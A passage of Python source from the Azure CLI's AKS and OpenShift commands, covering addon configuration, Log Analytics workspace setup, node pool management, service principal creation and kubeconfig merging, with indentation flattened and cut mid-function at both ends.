if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
managed_cluster_client = cf_managed_clusters(cmd.cli_ctx)
return _upgrade_single_nodepool_image_version(no_wait,
managed_cluster_client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
